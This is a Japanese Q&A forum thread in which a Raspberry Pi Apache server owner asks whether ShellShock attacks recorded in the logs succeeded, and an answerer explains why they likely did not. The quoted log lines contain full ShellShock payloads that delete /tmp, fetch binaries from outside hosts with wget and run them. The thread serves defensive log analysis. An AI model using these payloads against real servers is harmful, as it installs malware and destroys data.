質問をすることでしか得られない、回答やアドバイスがある。

15分調べてもわからないことは、質問しよう!

新規登録して質問してみよう
ただいま回答率
85.50%
bash

bash(Bourne-again-Shell)は sh(Bourne Shell)のインプリメンテーションに様々な機能が追加されたシェルです。LinuxやMac OS XではBashはデフォルトで導入されています。

Apache

Apacheは、Apache HTTP Serverの略で、最も人気の高いWebサーバソフトウェアの一つです。安定性が高いオープンソースソフトウェアとして商用サイトから自宅サーバまで、多くのプラットフォーム向けに開発・配布されています。サーバーソフトウェアの不具合(NCSA httpd)を修正するパッチ(a patch)を集積、一つ独立したソフトウェアとして開発されました。

PHP

PHPは、Webサイト構築に特化して開発されたプログラミング言語です。大きな特徴のひとつは、HTMLに直接プログラムを埋め込むことができるという点です。PHPを用いることで、HTMLを動的コンテンツとして出力できます。HTMLがそのままブラウザに表示されるのに対し、PHPプログラムはサーバ側で実行された結果がブラウザに表示されるため、PHPスクリプトは「サーバサイドスクリプト」と呼ばれています。

Raspberry Pi

Raspberry Piは、ラズベリーパイ財団が開発した、名刺サイズのLinuxコンピュータです。 学校で基本的なコンピュータ科学の教育を促進することを意図しています。

Q&A

解決済

1回答

3040閲覧

ShellShockを狙ったリクエストに対してApacheサーバーがどのように応答したか知りたい

aztarfi

総合スコア11

bash

bash(Bourne-again-Shell)は sh(Bourne Shell)のインプリメンテーションに様々な機能が追加されたシェルです。LinuxやMac OS XではBashはデフォルトで導入されています。

Apache

Apacheは、Apache HTTP Serverの略で、最も人気の高いWebサーバソフトウェアの一つです。安定性が高いオープンソースソフトウェアとして商用サイトから自宅サーバまで、多くのプラットフォーム向けに開発・配布されています。サーバーソフトウェアの不具合(NCSA httpd)を修正するパッチ(a patch)を集積、一つ独立したソフトウェアとして開発されました。

PHP

PHPは、Webサイト構築に特化して開発されたプログラミング言語です。大きな特徴のひとつは、HTMLに直接プログラムを埋め込むことができるという点です。PHPを用いることで、HTMLを動的コンテンツとして出力できます。HTMLがそのままブラウザに表示されるのに対し、PHPプログラムはサーバ側で実行された結果がブラウザに表示されるため、PHPスクリプトは「サーバサイドスクリプト」と呼ばれています。

Raspberry Pi

Raspberry Piは、ラズベリーパイ財団が開発した、名刺サイズのLinuxコンピュータです。 学校で基本的なコンピュータ科学の教育を促進することを意図しています。

0グッド

1クリップ

投稿2015/06/26 19:21

編集2015/06/28 05:59

[環境]
Linux raspberrypi 3.18.14-v7+
Apache/2.2.22 (Debian)
GNU bash, version 4.2.37(1)-release
PHP 5.4.41-0+deb7u1

はじめまして。
現在Apacheで動作しているサーバーのアクセスログに以下のような記録がありました。

lang

1222.186.56.51 - - [25/Jun/2015:21:11:03 +0900] "GET / HTTP/1.1" 200 533 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.56.51:5566/offce -O /tmp/China.Z-uotj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-uotj >> /tmp/Run.sh;echo /tmp/China.Z-uotj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://222.186.56.51:5566/offce -O /tmp/China.Z-uotj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-uotj >> /tmp/Run.sh;echo /tmp/China.Z-uotj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 2 3222.186.56.51 - - [25/Jun/2015:21:23:13 +0900] "GET / HTTP/1.1" 200 533 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo /tmp/China.Z-ppmw\x90 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 4 558.213.123.107 - - [26/Jun/2015:06:07:10 +0900] "GET / HTTP/1.1" 200 533 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/1122.32 -O /tmp/China.Z-toqj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-toqj >> /tmp/Run.sh;echo /tmp/China.Z-toqj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/1122.32 -O /tmp/China.Z-toqj >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-toqj >> /tmp/Run.sh;echo /tmp/China.Z-toqj >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" 6 761.161.130.253 - - [27/Jun/2015:02:13:31 +0900] "GET / HTTP/1.1" 408 417 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://202.103.243.104:911/sudp -O /tmp/China.Z-wsoc >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wsoc >> /tmp/Run.sh;echo /tmp/China.Z-wsoc >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "-" 8

ShellShockによって/tmp以下にシェルスクリプトを持ってきて実行したのち消す、というものだと思います。
今回質問させていただきたいのは、
1.最後のアクセスログ以外はHTTPステータスコードが200になっていますが、これはどのようなリクエストが成功したことを表すのでしょうか
2.最後のアクセスログのみHTTPステータスコードが408になっているのは、他のリクエストとどのような違いがあるためでしょうか
3.シェルスクリプトは実行されたのでしょうか
の3点です。
3.については何か転送されているようにも見えないので、おそらく大丈夫なのでは...と考えたのですが、何か見落としているのに気付いていないかもしれませんので申しわけありませんが質問させていただきます。
なにとぞよろしくお願いいたします。

気になる質問をクリップする

クリップした質問は、後からいつでもMYページで確認できます。

またクリップした質問に回答があった際、通知やメールを受け取ることができます。

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

guest

回答1

0

ベストアンサー

リファラーやユーザーエージェントにコードを仕込んでいますね。環境変数 HTTP_REFERER, HTTP_USER_AGENT を渡して bash を実行することにより、ShellShock の脆弱性を突こうというものだと思います。

リクエストは "GET / HTTP/1.1" ですので、普通にトップページにアクセスしています。
トップページが静的なページ(index.html)ならば bash は起動しませんので、コードは実行されません。

トップページが bash CGI だと影響があります。
PHP などでも、呼んでいる関数によっては bash が起動してしまうものがあるかもしれません。
もちろん、ShellShock 修正済みの bash であれば、コードが実行されることはありません。

408 (Request Timeout) となったのは、"GET / HTTP/1.1<CRLF>" の後、ヘッダの終了を示す "<CRLF>" が無いため、mod_reqtimeout が強制終了させているのではないでしょうか。

投稿2015/06/27 07:13

TaichiYanagiya

総合スコア12141

バッドをするには、ログインかつ

こちらの条件を満たす必要があります。

aztarfi

2015/06/27 07:52

回答していただきありがとうございます。 あくまでトップページへのアクセスが成功しただけで、リファラーなどのコードが実行されたかどうかとは関係がないのですね!勘違いしていました。 bashのバージョンについて env x='() { :;}; echo vulnerable' bash -c "echo this is a test" を実行して試してみたところ修正済みのもののようでしたので、今後動的なものを置く場合でも大丈夫そうです。 分かりやすいご回答、本当にありがとうございます。
guest

あなたの回答

tips

太字

斜体

打ち消し線

見出し

引用テキストの挿入

コードの挿入

リンクの挿入

リストの挿入

番号リストの挿入

表の挿入

水平線の挿入

プレビュー

15分調べてもわからないことは
teratailで質問しよう!

ただいまの回答率
85.50%

質問をまとめることで
思考を整理して素早く解決

テンプレート機能で
簡単に質問をまとめる

質問する

関連した質問